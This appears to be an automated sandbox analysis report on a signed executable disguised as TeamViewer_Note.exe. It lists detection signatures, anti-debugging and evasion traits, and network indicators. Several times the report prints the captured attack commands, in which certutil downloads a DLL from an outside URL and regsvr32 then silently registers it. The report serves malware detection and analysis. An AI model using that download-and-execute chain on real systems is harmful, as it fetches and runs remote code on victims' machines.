Windows Analysis Report cBQPecnQRp

Overview

General Information

Sample Name: cBQPecnQRp (renamed file extension from none to exe)
Analysis ID: 483791
MD5: 53817315b195e328ccc0f56b15b247c7
SHA1: 7bedab96b89d000288b573de0b5693cf49dae47f
SHA256: ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
Tags: exeHartexLLCsigned
Infos:

Most interesting Screenshot:

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 47
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Anomaly
Sigma detected: Suspicious Certutil Command
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: cBQPecnQRp.exe Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for domain / URL
Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dll Virustotal: Detection: 11% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: cBQPecnQRp.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2
PE / OLE file has a valid certificate
Source: cBQPecnQRp.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00466410 FindFirstFileExW, 1_2_00466410

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\certutil.exe Network Connect: 100.26.95.170 187 Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe Domain query: www.christchurchmvl.org
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 11:47:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: cBQPecnQRp.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cBQPecnQRp.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: cBQPecnQRp.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cBQPecnQRp.exe String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cBQPecnQRp.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: cBQPecnQRp.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: cBQPecnQRp.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: cBQPecnQRp.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: cBQPecnQRp.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cBQPecnQRp.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: cBQPecnQRp.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: cBQPecnQRp.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: cBQPecnQRp.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: cBQPecnQRp.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: cBQPecnQRp.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: cBQPecnQRp.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: cBQPecnQRp.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: cBQPecnQRp.exe String found in binary or memory: https://sectigo.com/CPS0
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmp String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:
Source: cBQPecnQRp.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown DNS traffic detected: queries for: www.christchurchmvl.org
Source: global traffic HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: www.christchurchmvl.org
Source: global traffic HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: www.christchurchmvl.orgCache-Control: no-cache
Source: unknown HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2

System Summary:

barindex
Uses 32bit PE files
Source: cBQPecnQRp.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004340B0 1_2_004340B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00432A00 1_2_00432A00
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0049C051 1_2_0049C051
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0046207C 1_2_0046207C
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004520EB 1_2_004520EB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00402080 1_2_00402080
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004961AB 1_2_004961AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004321AB 1_2_004321AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00402210 1_2_00402210
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004443F0 1_2_004443F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0048C4C0 1_2_0048C4C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004744D0 1_2_004744D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0049E4E7 1_2_0049E4E7
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004024F2 1_2_004024F2
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004685D0 1_2_004685D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00484580 1_2_00484580
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004025A0 1_2_004025A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0048E620 1_2_0048E620
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00402700 1_2_00402700
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0045A7C0 1_2_0045A7C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00484790 1_2_00484790
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00402850 1_2_00402850
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00424970 1_2_00424970
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004029E0 1_2_004029E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00402B70 1_2_00402B70
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00464CC9 1_2_00464CC9
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00402CF0 1_2_00402CF0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00402E70 1_2_00402E70
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0048CFC0 1_2_0048CFC0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0049901A 1_2_0049901A
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0045B2E0 1_2_0045B2E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004773C0 1_2_004773C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00401390 1_2_00401390
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00433450 1_2_00433450
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004454F0 1_2_004454F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0046B48F 1_2_0046B48F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004514A0 1_2_004514A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004014B0 1_2_004014B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0045154D 1_2_0045154D
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00433569 1_2_00433569
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004755F0 1_2_004755F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0046B5AF 1_2_0046B5AF
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00401610 1_2_00401610
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00493680 1_2_00493680
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00401760 1_2_00401760
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0048D7F0 1_2_0048D7F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004337A0 1_2_004337A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00499809 1_2_00499809
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004518BF 1_2_004518BF
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0048B9A0 1_2_0048B9A0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 00421740 appears 48 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 0044FEB0 appears 40 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 0044F762 appears 75 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 00420FA0 appears 63 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: String function: 0044F26F appears 71 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 1_2_0044E3F5
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: cBQPecnQRp.exe Binary or memory string: OriginalFilename vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
PE file contains strange resources
Source: cBQPecnQRp.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: actxapilib.dll Jump to behavior
Source: cBQPecnQRp.exe Virustotal: Detection: 10%
Source: cBQPecnQRp.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' Jump to behavior
Source: classification engine Classification label: mal72.evad.winEXE@8/1@2/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00422D90 LoadResource,LockResource,SizeofResource, 1_2_00422D90
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Command line argument: ~GI 1_2_004946D0
Source: C:\Windows\SysWOW64\certutil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: cBQPecnQRp.exe Static file information: File size 1363448 > 1048576
Source: cBQPecnQRp.exe Static PE information: certificate valid
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cBQPecnQRp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cBQPecnQRp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00434A6C push eax; ret 1_2_00434A91
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00410AAA push ss; iretd 1_2_00410AAB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044F73C push ecx; ret 1_2_0044F74F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx 1_2_00493991
PE file contains sections with non-standard names
Source: cBQPecnQRp.exe Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004A5845
Registers a DLL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0044E000

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\certutil.exe TID: 6060 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo, 1_2_0044C1E6
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00466410 FindFirstFileExW, 1_2_00466410

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW, 1_2_0044EE91
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004A5845
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree, 1_2_004944F0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0046619E mov eax, dword ptr fs:[00000030h] 1_2_0046619E
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00434891 mov eax, dword ptr fs:[00000030h] 1_2_00434891
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h] 1_2_0044ECD5
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h] 1_2_0045D9CF
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044FE43 SetUnhandledExceptionFilter, 1_2_0044FE43
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0045976E
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0044F8B8

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\certutil.exe Network Connect: 100.26.95.170 187 Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe Domain query: www.christchurchmvl.org
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 1_2_00468B1F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: EnumSystemLocalesW, 1_2_00468DC7
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: EnumSystemLocalesW, 1_2_00468E12
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: EnumSystemLocalesW, 1_2_00468EAD
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 1_2_00468F40
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW, 1_2_004691A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 1_2_004692C6
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW, 1_2_004693CC
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 1_2_0046949B
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: EnumSystemLocalesW, 1_2_0046354D
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: GetLocaleInfoW, 1_2_004639F3
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_0041E0FC cpuid 1_2_0041E0FC
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_00440690 GetLocalTime, 1_2_00440690

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 1_2_004A85C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe Code function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 1_2_004A7879
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 483791 Sample: cBQPecnQRp Startdate: 15/09/2021 Architecture: WINDOWS Score: 72 26 Multi AV Scanner detection for domain / URL 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 Sigma detected: Regsvr32 Anomaly 2->30 32 Sigma detected: Suspicious Certutil Command 2->32 7 cBQPecnQRp.exe 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        process5 11 certutil.exe 14 9->11         started        16 regsvr32.exe 9->16         started        18 conhost.exe 9->18         started        dnsIp6 22 christchurchmvl.org 100.26.95.170, 443, 49772, 49773 AMAZON-AESUS United States 11->22 24 www.christchurchmvl.org 11->24 20 C:\ProgramData\actXApiLib.dll, HTML 11->20 dropped 34 System process connects to network (likely due to code injection or exploit) 11->34 file7 signatures8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
100.26.95.170
 christchurchmvl.org United States
14618 AMAZON-AESUS true

Contacted Domains

Name IP Active
christchurchmvl.org 100.26.95.170 true
www.christchurchmvl.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.christchurchmvl.org/volunteer/actXApiLib.dll true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown